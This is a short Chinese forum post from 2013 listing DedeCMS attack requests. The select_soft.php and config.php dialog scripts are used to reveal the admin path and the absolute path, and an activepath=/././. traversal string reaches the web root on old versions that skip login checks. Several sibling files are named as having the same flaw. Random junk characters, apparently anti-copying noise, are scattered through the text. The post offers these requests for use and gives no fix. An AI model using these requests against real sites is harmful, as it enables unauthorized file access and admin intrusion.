1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理" t6 |# j7 l5 G2 b" _
7 ]2 N3 m! _6 O3 Y m
员帐号,新版本的就直接转向了后台.
: p+ C' z; L/ P& I1 `8 y
2 c: f" ~9 z5 t$ P2.include/dialog/config.php会爆出后台管理路径0 g# T2 A# j' ~2 i
- B! O; z2 y' i" B8 R0 q
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
* F. P8 `+ m, p6 H2 P7 [; k( c* `' p# b J
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径. t& k# H i' `! O& \( h# [
3 c. V( ~! L- _
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
0 S* T7 R6 |- w3 Y# y% h- x1 @: M1 B
到根目录去.不过这些版本的访问地址有些不同.$ c" ]; Z* H5 R5 `& u' p3 f2 n) b
地址为require/dialog/select_soft.php?activepath=/././././././././
2 _* [1 ?: q7 n3 c* h9 c7 a( T9 L6 f& e1 j# H3 x
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..' W0 l- |- I; x/ s7 v+ W5 G% p% H
存在相同问题的文件还有
6 U1 q/ _* U8 Dinclude\dialog\select_images.php
. W: E% P. `* k0 S0 V7 Oinclude\dialog\select_media.php) N8 H" @2 u; I# p
include\dialog\select_templets.php
. y) d) ]% K' t) q% H: I |
发表于 2013-4-16 16:50:43
收藏
支持
反对